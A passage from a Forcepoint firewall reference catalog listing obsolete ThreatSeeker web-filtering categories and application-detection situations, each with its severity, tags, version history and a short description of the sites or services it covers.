Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Log in sites for corporate or institutional email systems.
Back to top

TS_Other-AI-ML-Applications

About this situation: ThreatSeeker Other AI ML Applications
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1649-5242
Last changed: sgpkg-ips-1649-5242
Description: Sites that provide tools or services related to artificial intelligence and machine learning. Includes sites hosting applications with personal productivity or business purposes using AI but not typically capable of generating new content.
Back to top

TS_Parked-Domain

About this situation: ThreatSeeker Parked Domain
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are expired, offered for sale, or known to display targeted links and advertisements.
Back to top

TS_Pay-to-Surf

About this situation: ThreatSeeker Pay-to-Surf
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that reward users for online activity such as viewing websites, advertisements or email.
Back to top

TS_Peer-to-Peer-File-Sharing

About this situation: ThreatSeeker Peer-to-Peer File Sharing
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide client software to enable peer-to-peer file sharing and transfer.
Back to top

TS_Personal-Network-Storage-and-Backup

About this situation: ThreatSeeker Personal Network Storage and Backup
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that store personal files on web servers for backup or exchange.
Back to top

TS_Personals-and-Dating

About this situation: ThreatSeeker Personals and Dating
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that assist users in establishing interpersonal relationships, excluding those intended to arrange for sexual encounters.
Back to top

TS_Phishing-and-Other-Frauds

About this situation: ThreatSeeker Phishing and Other Frauds
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that counterfeit legitimate sites to elicit financial or other private information from users.
Back to top

TS_Political-Organizations

About this situation: ThreatSeeker Political Organizations
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or providing information about political parties and interest groups focused on elections or legislation.
Back to top

TS_Potentially-Exploited-Documents

About this situation: ThreatSeeker Potentially Exploited Documents
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Documents containing content with suspicious characteristics that could lead to the exploitation of a machine.
Back to top

TS_Potentially-Unwanted-Software

About this situation: ThreatSeeker Potentially Unwanted Software
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites using technologies that alter the operation of a user's hardware, software or network in ways that diminish control over the user experience, privacy or the collection and distribution of personal information.
Back to top

TS_Prescribed-Medications

About this situation: ThreatSeeker Prescribed Medications
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about approved drugs and their medical use.
Back to top

TS_Private-IP-Addresses

About this situation: ThreatSeeker Private IP Addresses
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: IP addresses defined in RFC 1918 document on Address Allocation for Private Intranets.
Back to top

TS_Pro-Choice

About this situation: ThreatSeeker Pro-Choice
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or are sponsored by organizations that support legal abortion or that offer support or encouragement to those seeking the procedure.
Back to top

TS_Pro-Life

About this situation: ThreatSeeker Pro-Life
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or are sponsored by organizations that oppose legal abortion or that seek increased restriction of abortion.
Back to top

TS_Productivity

About this situation: ThreatSeeker Productivity
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Advertisements, Application and Software Download, Instant Messaging, Message Boards and Forums, Online Brokerage and Trading and Pay-toSurf.
Back to top

TS_Professional-and-Worker-Organizations

About this situation: ThreatSeeker Professional and Worker Organizations
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or that support or offer information about organizations devoted to professional advancement or workers' interests.
Back to top

TS_Proxy-Avoidance

About this situation: ThreatSeeker Proxy Avoidance
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about how to bypass proxy server features or to gain access to URLs in any way that bypasses the proxy server.
Back to top

TS_Real-Estate

About this situation: ThreatSeeker Real Estate
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about renting, buying, selling or financing residential real estate.
Back to top

TS_Reference-Materials

About this situation: ThreatSeeker Reference Materials
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer reference-shelf content such as atlases, dictionaries, encyclopedias, formularies, white and yellow pages, and public statistical data.
Back to top

TS_Religion

About this situation: ThreatSeeker Religion
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the categories: Non-Traditional Religion and Traditional Religions.
Back to top

TS_Restaurants-and-Dining

About this situation: ThreatSeeker Restaurants and Dining
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that list, review, advertise or promote food, dining or catering services.
Back to top

TS_Search-Engines-and-Portals

About this situation: ThreatSeeker Search Engines and Portals
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support searching the web, news groups or indices or directories thereof.
Back to top

TS_Security

About this situation: ThreatSeeker Security
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Forcepoint Security Filtering adds extra protection from web-based threats by providing additional security-related website categories. These allow you to develop policies to block access to sites associated with spyware, phishing, keylogging and malicious mobile code.
Back to top

TS_Service-and-Philanthropic-Organizations

About this situation: ThreatSeeker Service and Philanthropic Organizations
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or that support or offer information about organizations devoted to doing good as their primary activity.
Back to top

TS_Sex

About this situation: ThreatSeeker Sex
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that depict or graphically describe sexual acts or activity, including exhibitionism; sites offering direct links to such sites.
Back to top

TS_Sex-Education

About this situation: ThreatSeeker Sex Education
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer information about sex and sexuality, with no pornographic intent.
Back to top

TS_Shopping

About this situation: ThreatSeeker Shopping
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support the online purchase of consumer goods and services except: sexual materials, lingerie, swimwear, investments, medications, educational materials, computer software or hardware, alcohol, tobacco, travel, vehicles and parts, weapons.
Back to top

TS_Social-and-Affiliation-Organizations

About this situation: ThreatSeeker Social and Affiliation Organizations
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or that support or offer information about organizations devoted chiefly to socializing or common interests other than philanthropy or professional advancement.
Back to top

TS_Social-Networking

About this situation: ThreatSeeker Social Networking
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites of web communities that provide users with means for expression and interaction.
Back to top

TS_Social-Organizations

About this situation: ThreatSeeker Social Organizations
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Professional and Worker Organizations, Service and Philanthropic Organizations and Social and Affiliation Organizations.
Back to top

TS_Social-Web-Facebook

About this situation: ThreatSeeker Social Web - Facebook
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the Facebook domain. Contains: Facebook Apps, Chat, Commenting, Events, Friends, Games, Groups, Mail, Photo Upload, Posting, Questions and Video Upload.
Back to top

TS_Social-Web-LinkedIn

About this situation: ThreatSeeker Social Web - LinkedIn
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the LinkedIn domain. Contains: LinkedIn Connections, Jobs, Mail and Updates.
Back to top

TS_Social-Web-Twitter

About this situation: ThreatSeeker Social Web - Twitter
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the Twitter domain. Contains: Twitter Follow, Mail and Posting
Back to top

TS_Social-Web-Various

About this situation: ThreatSeeker Social Web - Various
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage various domain controls: Blog Commenting, Posting and Classifieds Posting.
Back to top

TS_Social-Web-YouTube

About this situation: ThreatSeeker Social Web - YouTube
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Category used to manage the YouTube domain. Contains: YouTube Commenting, Sharing and Video Upload.
Back to top

TS_Society-and-Lifestyles

About this situation: ThreatSeeker Society and Lifestyles
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about matters of daily life, excluding entertainment, health, hobbies, jobs, sex and sports.
Back to top

TS_Special-Events

About this situation: ThreatSeeker Special Events
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites devoted to a current event that requires separate categorization.
Back to top

TS_Sport-Hunting-and-Gun-Clubs

About this situation: ThreatSeeker Sport Hunting and Gun Clubs
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or directories of gun clubs and similar groups, including war-game and paintball facilities.
Back to top

TS_Sports

About this situation: ThreatSeeker Sports
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote sports, active games and recreation.
Back to top

TS_Spyware

About this situation: ThreatSeeker Spyware
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that download software that generate HTTP traffic (other than simple user identification and validation) without a user's knowledge.
Back to top

TS_Streaming-Media

About this situation: ThreatSeeker Streaming Media
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable streaming of media content.
Back to top

TS_Surveillance

About this situation: ThreatSeeker Surveillance
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable real-time monitoring of various operations via network cameras, webcams and other video recording devices.
Back to top

TS_Suspicious-Content

About this situation: ThreatSeeker Suspicious Content
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites found to contain suspicious content.
Back to top

TS_Suspicious-Embedded-Link

About this situation: ThreatSeeker Suspicious Embedded Link
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites suspected of being infected with a malicious link.
Back to top

TS_Tasteless

About this situation: ThreatSeeker Tasteless
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites with content that is gratuitously offensive or shocking, but not violent or frightening. Includes sites devoted in part or whole to scatology and similar topics or to improper language, humor or behavior.
Back to top

TS_Text-and-Media-Messaging

About this situation: ThreatSeeker Text and Media Messaging
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable the sending of messages and other content via SMS, EMS, MMS or similar protocols.
Back to top

TS_Traditional-Religions

About this situation: ThreatSeeker Traditional Religions
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote Bahai, Buddhism, Christian Science, Christianity, Hinduism, Islam, Judaism, Mormonism, Shinto and Sikhism, as well as atheism.
Back to top

TS_Travel

About this situation: ThreatSeeker Travel
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote travel-related services and destinations.
Back to top

TS_Twitter-Follow

About this situation: ThreatSeeker Twitter Follow
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Twitter function that enables a user to add a connection.
Back to top

TS_Twitter-Mail

About this situation: ThreatSeeker Twitter Mail
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Twitter function that enables a user to send an email within the Twitter community.
Back to top

TS_Twitter-Posting

About this situation: ThreatSeeker Twitter Posting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Twitter function that enables a user to post an update.
Back to top

TS_Unauthorized-Mobile-Marketplaces

About this situation: ThreatSeeker Unauthorized Mobile Marketplaces
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against websites that may distribute applications unauthorized by the mobile OS manufacturer, the handheld device manufacturer or the network provider. (Traffic visiting websites in this category may indicate jail-broken or rooted phones.)
Back to top

TS_Uncategorized

About this situation: ThreatSeeker Uncategorized
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites not categorized in the Master Database.
Back to top

TS_User-Defined

About this situation: ThreatSeeker User-Defined
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: User-defined category.
Back to top

TS_Vehicles

About this situation: ThreatSeeker Vehicles
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote vehicles, including those that support online purchase of vehicles or parts.
Back to top

TS_Violence

About this situation: ThreatSeeker Violence
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that feature or promote violence or bodily harm, including self-inflicted harm; or that gratuitously display images of death, gore or injury; or that feature images or descriptions that are grotesque or frightening and of no redeeming value.
Back to top

TS_Viral-Video

About this situation: ThreatSeeker Viral Video
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host videos with high or rapidly rising popularity.
Back to top

TS_Weapons

About this situation: ThreatSeeker Weapons
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about, promote, or support the sale of weapons and related items.
Back to top

TS_Web-Analytics

About this situation: ThreatSeeker Web Analytics
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are associated with web traffic analysis.
Back to top

TS_Web-and-Email-Marketing

About this situation: ThreatSeeker Web and Email Marketing
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are associated with online marketing.
Back to top

TS_Web-and-Email-Spam

About this situation: ThreatSeeker Web and Email Spam
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites whose links are sent in unsolicited commercial email, either as part of campaigns to promote products or services or to entice readers to click through to surveys or similar sites. Also includes sites that display comment spam.
Back to top

TS_Web-Chat

About this situation: ThreatSeeker Web Chat
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host web chat services or that support or provide information about chat via HTTP or IRC.
Back to top

TS_Web-Collaboration

About this situation: ThreatSeeker Web Collaboration
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide virtual workspace for purposes of collaboration and conferencing, which may include sites that enable authorized access to a computer or network from a remote location.
Back to top

TS_Web-Hosting

About this situation: ThreatSeeker Web Hosting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites of organizations that provide hosting services, or top-level domain pages of web communities.
Back to top

TS_Web-Images

About this situation: ThreatSeeker Web Images
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that deliver image content.
Back to top

TS_Web-Infrastructure

About this situation: ThreatSeeker Web Infrastructure
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are associated with website architecture.
Back to top

TS_Website-Translation

About this situation: ThreatSeeker Website Translation
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable translation of website text.
Back to top

TS_YouTube-Commenting

About this situation: ThreatSeeker YouTube Commenting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: YouTube function that enables a user to comment, like or dislike.
Back to top

TS_YouTube-Sharing

About this situation: ThreatSeeker YouTube Sharing
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: YouTube function that enables a user to share a video within and outside of the YouTube community.
Back to top

TS_YouTube-Video-Upload

About this situation: ThreatSeeker YouTube Video Upload
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: YouTube function that enables a user to upload a video.
Back to top

Tube8

About this situation: Tube8 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Tube8 is an adult video streaming service.
Back to top

Tubely

About this situation: Tubely usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

TubeMogul

About this situation: TubeMogul usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Description: TubeMogul is an advertisement and usage statistic collection company.
Back to top

Tubi

About this situation: Tubi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1673-5242
Description: Tubi is a add supported over-the-top streaming service. This application situation is meant only for blocking the application.
Back to top

Tudou

About this situation: Tudou (or iTudou) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-630-5211
Description: TuDou is one of the largest online video sharing website in China. Unregistered users can browse, play, and comment on published video clips. Registered users can publish video clips to the website.
Back to top

Tuenti

About this situation: Tuenti usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to create a profile, upload photos, link videos, connect with friends, chat, and create events. Users can join only by invitation. Source: Wikipedia
Back to top

Tumblr

About this situation: Tumblr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-650-5211
Description: Tumblr is a microblogging platform and social networking website.
Back to top

Tune

About this situation: Application Tune detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tune is a single platform for marketing your mobile app. Tune tracking is vital to learning the value of customers from your marketing and advertising campaigns.
Back to top

Tunein

About this situation: TuneIn usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-653-5211
Description: TuneIn's website and mobile apps offer the user the ability to listen to streaming audio of thousands of radio networks and radio stations in the United States and worldwide, including AM, FM, HD, LP, digital and internet stations. Source: Wikipedia
Back to top

Tungle.me

About this situation: Tungle.me usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: Tungle.me is a personal scheduling application, which lets users publish availability, accept appointment requests, and plan meetings.
Back to top

Tungsten-Network

About this situation: Application Tungsten-Network detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tungsten Network offers e-invoicing, invoice finance and spend analytics solutions for AP and AR professionals.
Back to top

Tunneling Level Limit Exceeded

About this situation: Number of tunneling (encapsulation) levels in a packet exceeded configured limit
Context: Sensor engine situation
Severity: 1
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: Number of tunneling (encapsulation) levels in a packet exceeded limit. Note: This situation action and logging parameters are configured in Engine properties Tunneled Traffic dialog. Also please note that this situation must be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

Turbine

About this situation: Application Turbine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Turbine is online application for purchasing, expenses, employee time-off and HR records.
Back to top

Turbo VPN

About this situation: Turbo VPN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1379-5242
Description: Turbo VPN can be used to bypass network restrictions.
Back to top

Turbobit

About this situation: Turbobit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-622-5211
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

TurboBridge

About this situation: Application TurboBridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: TurboBridge operates a cloud-based audio conferencing service with global reach, providing flexible and affordable retail and wholesale services to companies of every size.
Back to top

Turbotax

About this situation: Application Turbotax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TurboTax provides tax preparation software package.
Back to top

Turboupload(xfilesharingpro)

About this situation: TurboUpload(XFileSharingPro) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a data storage and backup service that allows users to store files.
Back to top

Turnitin

About this situation: Application Turnitin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Turnitin is an Internet-based plagiarism-prevention service. Universities and high schools buy licenses to submit essays to the Turnitin website, which checks the documents for unoriginal content.
Back to top

Turnkey-Lender

About this situation: Application Turnkey-Lender detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Turnkey Lender is an lending software with credit application processing and loan management for payday lenders, microfinance, online lending businesses.
Back to top

Turun-Sanomat

About this situation: Turun Sanomat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-628-5211
Description: Turun Sanomat is a Finnish daily newspaper.
Back to top

TUV-Rhineland

About this situation: Application TUV-Rhineland detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TUV Rheinland is a provider of technical services for safety and quality in order to meet the challenges arising from the interaction between man, technology and the environment.
Back to top

TV4-Play

About this situation: TV4 Play usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A video sharing website in Sweden.
Back to top

TVB

About this situation: TVB usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-630-5211
Description: TVB (Television Broadcasts Limited) is a chinese commercial television station.
Back to top

TVB-MyTV

About this situation: TVB MyTV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-689-5211
Description: TVB (Television Broadcasts Limited) is a chinese commercial television station. MyTV is their video streaming service, which is accessible at mytv.tvb.com.
Back to top

TVCATCHUP

About this situation: TVCatchup usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: TVCatchup is an internet television service for viewing free-to-air UK channels. It operates as a cable service and retransmits BBC, ITV, Channel 4, Channel 5 amongst others, only in the UK. Users can access the service via desktop browsers as well as smartphone and tablet apps.
Back to top

TVCHANNELSFREE

About this situation: tvchannelsfree usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

TVFORUS

About this situation: TVforus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
